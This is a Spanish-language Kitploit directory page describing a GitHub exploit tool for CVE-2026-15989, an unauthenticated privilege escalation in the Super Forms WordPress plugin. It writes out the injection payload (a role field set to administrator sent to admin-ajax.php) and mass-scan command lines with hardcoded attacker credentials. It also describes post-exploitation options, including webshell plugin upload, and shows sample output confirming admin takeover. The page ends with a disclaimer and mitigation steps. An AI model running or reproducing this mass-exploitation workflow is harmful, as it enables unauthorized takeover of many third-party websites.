Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-15989 — Escáner masivo y exploit para CVE-2026-15989, la escalada de privilegios no autenticada en Super Forms <= 6.3.316 que crea cuentas de administrador a través del parámetro role. | Kitploit
Herramientas/GitHubGitHub/fl0ydsec/cve-2026-15989
Escalada de PrivilegiosEscáneres de VulnerabilidadesGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónSeguridad WebPruebas de Penetración
GitHubfl0ydsec/cve-2026-15989

CVE-2026-15989

hace 6h 10mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Escáner masivo y exploit para CVE-2026-15989, la escalada de privilegios no autenticada en Super Forms <= 6.3.316 que crea cuentas de administrador a través del parámetro role.

Ver Repositorio

CVE-2026-15989 — Super Forms ≤ 6.3.316 — PoC de escalada de privilegios no autenticada

Super Forms – Drag & Drop Form Builder (WordPress) ≤ 6.3.316 — escalada de privilegios no autenticada a través del parámetro role del add-on premium Register & Login.

CVE-2026-15989 CVSS WordPress Auth

Author Python Telegram


📋 Descripción general de la vulnerabilidad

AtributoDetalles
CVE IDCVE-2026-15989
Cadenaformulario de registro → 'role' en $other_userdata → wp_insert_user(role=administrator) → ADMIN
Severidad🔴 CRÍTICA (CVSS 9.8)
ObjetivoSuper Forms – Drag & Drop Form Builder + add-on premium Register & Login
Afectados≤ 6.3.316 (core) — builds del add-on vulnerables (v1.x)
Corregido6.3.317
Autenticación requeridaNinguna

🔍 Descripción técnica

El add-on establece el rol del nuevo usuario desde la configuración del formulario ($userdata['role'] = $settings['register_user_role']), luego recorre $other_userdata — que contiene 'role' — y sobrescribe cualquier clave con el valor proporcionado por el cliente ($data['role']['value']) antes de llamar a wp_insert_user().

POST /wp-admin/admin-ajax.php  (unauthenticated)
        │
        ▼
action=super_submit_form + data={"role":{"value":"administrator"}, ...}
        │
        ▼
$other_userdata loop ─► $userdata['role'] = $data['role']['value']
        │
        ▼
wp_insert_user() ─► administrator account created
        │
        ▼
register_login_activation='login'/'auto' ─► wp_set_auth_cookie ─► admin session

Corrección (6.3.317): 'role' eliminado de la lista blanca + get_safe_public_registration_role() (fail-closed).

Investigación original — protocolo de doble envío: el core cambió de protocolo en la v5.0.0.

CoreAcciónFormato de datosNonce
4.xsuper_send_emailcampos anidados (data[role][value]=...)ninguno (comprobaciones comentadas)
5.x/6.xsuper_submit_formcadena JSONsf_nonce vía super_create_nonce

La herramienta selecciona el protocolo automáticamente según la versión detectada.


🚀 Uso

# mass scan + exploit
python CVE-2026-15989.py --list targets.txt --threads 10 --force --only-hits --results hits.txt --user Floydroot --password 'Floyd@2026!root'
python CVE-2026-15989.py --list targets.txt --threads 15 --timeout 6 --force --quiet --results hits.txt --user U --password P --no-dedup

# single target
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --email EMAIL --insecure
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --login --rce --insecure

# re-check an existing account without re-registering
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --only-login --insecure
OpciónDescripción
--list FILEUn objetivo por línea; URL|form_id o URL|form_id=ID,email=X por línea
-u/--target, --portObjetivo único
--threads, --timeout, --no-dedupAjuste del modo masivo
--forceDispara el payload incluso sin un formulario de registro detectado
--only-hits / --quietÁrboles solo para objetivos confirmados / salida mínima
--resetfinalización del modo verify vía lost-password (el operador pega el enlace de restablecimiento)
--only-loginOmite el registro; inicia sesión y comprueba el rol vía users/me
--login / --rcePost-explotación en objetivo real: prueba de login / subida de plugin webshell
-k/--insecureIgnorar TLS

📊 Salida

│  ├─ plugin   : 6.3.316 — VULNERABLE <= 6.3.316
│  ├─ addon    : v1.8.7
│  ├─ form     : 4169 (/register/)
│  ├─ proto    : 5.x/6.x (super_submit_form, JSON, sf_nonce)
│  ├─ payload  : HTTP 200 ✓ processed
│  └─ session  : cookie ✓ · admin confirmed — Floydroot/Floyd@2026!root
└─── ✔ ADMIN CONFIRMED
  • hits.txt — solo objetivos confirmados (ts|url|status|detail, con usuario/contraseña)
  • barra con ETA + contadores por estado; cada fase imprime el motivo real en caso de fallo (WAF, crash, formulario solo de login, protocolo incorrecto...)

⚙️ Características

  • Doble protocolo (4.x datos anidados / 5+ JSON+nonce) — seleccionado automáticamente por versión
  • Detección de versión: readme.txt Stable tag + common.js?ver=; sonda del add-on + su propia versión
  • Descubrimiento de formularios de registro: rutas comunes + sitemap.xml/wp-sitemap.xml/sitemap_index + enlaces de la home
  • Autorrelleno de campos obligatorios (incluidos ocultos/condicionales)
  • "already exists" → prueba de login directa de la cuenta existente
  • Control de crash: reenvía el formulario sin el rol inyectado para distinguir problemas del lado del servidor de crashes provocados por la inyección
  • Prueba autoritativa de admin vía /wp-json/wp/v2/users/me?context=edit (fallback: users.php / dashboard)

📁 Estructura de archivos

├── CVE-2026-15989.py   # mass scanner + exploit
├── README.md
├── LICENSE
└── .gitignore

⚠️ Aviso legal

╔══════════════════════════════════════════════════════════════════╗
║                        LEGAL DISCLAIMER                          ║
╠══════════════════════════════════════════════════════════════════╣
║  This tool is provided for EDUCATIONAL and AUTHORIZED           ║
║  SECURITY TESTING purposes only.                                ║
║  Only use on systems you own or have explicit permission.       ║
║  The author is NOT responsible for any misuse or damage.        ║
╚══════════════════════════════════════════════════════════════════╝

🛡️ Mitigación

  1. Actualiza Super Forms a 6.3.317 (o posterior) y rota cualquier credencial filtrada
  2. Mantén actualizado el add-on Register & Login (tiene su propio ciclo de versiones)
  3. Elimina/deshabilita los formularios de registro publicados cuando no sean necesarios
  4. Audita los usuarios de wp-admin/ en busca de cuentas de administrador inesperadas

👤 Autor

fl0ydsec (Floydroot)

GitHub Telegram

Security Research

Descargar herramienta